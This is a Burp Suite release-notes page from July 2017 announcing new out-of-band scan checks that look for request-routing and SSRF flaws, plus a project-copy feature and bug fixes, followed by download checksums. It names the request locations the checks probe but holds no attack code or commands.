Support Center

Burp Community

See what our users are saying about Burp Suite:

How do I?

New Post View All

Feature Requests

New Post View All

Burp Extensions

New Post View All

Bug Reports

New Post View All

Burp Suite Documentation

Take a look at our Documentation section for full details about every Burp Suite tool, function and configuration option.

Full Documentation Contents Burp Projects
Suite Functions Burp Tools
Options Using Burp Suite

Burp Extender

Burp Extender lets you extend the functionality of Burp Suite in numerous ways.

Extensions can be written in Java, Python or Ruby.

API documentation Writing your first Burp Suite extension
Sample extensions View community discussions about Extensibility

Thursday, July 27, 2017


This release adds a number of new scan checks based on our talk today at Black Hat, Cracking the lens: targeting HTTP's hidden attack surface.

The new scan checks use various techniques aimed at inducing vulnerable applications and infrastructure to route requests to a different destination. This can lead to serious attacks, for example SSRF against the application server itself or other infrastructure components. The research behind the new capabilities quickly netted us over $30,000 in bug bounty payouts, and demonstrates the huge power of OAST (out-of-band application security testing).

The novelty of the new checks lies not so much in the payloads themselves as where they are placed. The new scan checks send Collaborator-based payloads in the following locations:
  • The HTTP Request-Line (where the requested URL normally appears).
  • The server name specified in the SSL SNI extension.
  • The server specified in a CONNECT request.
  • The Host header.
  • Various other common and not-so-common request headers.
An example of a reported vulnerability is shown below. For full details of these and various other techniques, see today's blog post.
MD5: f66087ddd397d3b293468d308c512882
SHA256: 86a601aa79d8ef7353b5553cf72f32923ce6a1c9824c570bdc55734960c2ebf4

MD5: 7d4d7ce37c03198db796b8ce2e33ff68
SHA256: bd1153672fab9250e3ab313f239948f37271f45d63c30b02a41cf2652f735c88

MD5: 6995f2f0a24b014a6708f42657be7086
SHA256: e3df386479dac58a27ff436ee2a9508f0c66c8c3053b40b38f524104b9ba2990

MD5: 7a04f8454ba3d34299748c18184da08f
SHA256: c4290923b9e77db55b436e0d2f932277aa97d7dace56b3464f1ec515670d0e5d

MD5: 07dad6f191ee8335c1d5e131102e9dc7
SHA256: ebfd26f0396a1c38826b83ad98e3242f7a2964bf85aa7acb886f73278921eb39

Tuesday, July 18, 2017


This release adds a new feature to save a copy of the current project.

You can choose the tools whose data you want to be included in the project file and whether you only want to save in-scope items.

The new feature is useful for various purposes:
  • You can begin working in a temporary project, and later save it to disk if it proves useful.
  • You can save a live backup copy of a disk-based project while continuing to work.
  • You can save a smaller copy of a project after refining your target scope or deleting unnecessary data.
Note that after Burp saves the copy of the current project, it continues working in the current project. If you want to switch to using the newly saved copy, you will need to restart Burp and select the new project file at startup.

Some bugs have also been fixed:
  • A bug that caused SNI not to work with upstream HTTP proxy servers.
  • A bug that caused the Burp Infiltrator patcher to cause bytecode corruption, or fail to patch at all, when certain unusual bytecode features were encountered.
  • A bug that could cause remembered user settings to be lost if the user closed down Burp during startup.
  • Various other bugfixes and enhancements.
MD5: 5ca9ba7734ee97fbb8b1bd2343e94b72
SHA256: 37130dbff32c552c5ac20e2855515217ffc1e7285aae6d12f862d026b3365896

MD5: 5b9a650f0eeda7d5a477836f8e768a91
SHA256: 4edfbf71499ffbaa5baaac04db6eed995537ca39da98928e649e6922abff1f20

MD5: c9d2945ce3da7d6965745128c96ae5d9
SHA256: 265642d84921be9298a979fc963382e845c629c2effa76827ca54394a447f8ac

MD5: 1fcccd74d654c28356479cb2c99528e4
SHA256: 68ac0a547eaef6d2b3b80ef957022270dcce98452fec42795489b4cc00313042

MD5: c93e28ea48cad1df0171284a02be8086
SHA256: 005d16f08047062fb6bdee6deabbbf13eee63d14188d8acfa073ffd8cb032db7
MD5: 255fc4175b53f354f1c871ff96d49cdf
SHA256: e468618b8d06ac3b661a1df49aa2505a47f2d12e36edbddcab3dab9683422a01

MD5: c75615e238d49c63a1443692d25ddd18
SHA256: 4704416581977d01c3da66c5d3450e0ec1d7366ef871ddae49df17039357d173

MD5: 0c88ca1dccbb70e40ee5484a9ba36879
SHA256: e47eb6be8a54684623a8494cbffac4ced49f3228f3ad1c898e7bf54ff671b550

MD5: 3b6e9252deb81ddb44412c119271ad64
SHA256: d49f840c3d820175907a56033432f230ca392e4aad2ff01fc70418d5a1dd764e

MD5: f65275ba3316348079b95c032195db17
SHA256: d60550e64089dda0e5e786d80f8fc9862be4de2b8f5397fdbe7e48f8d310e0dd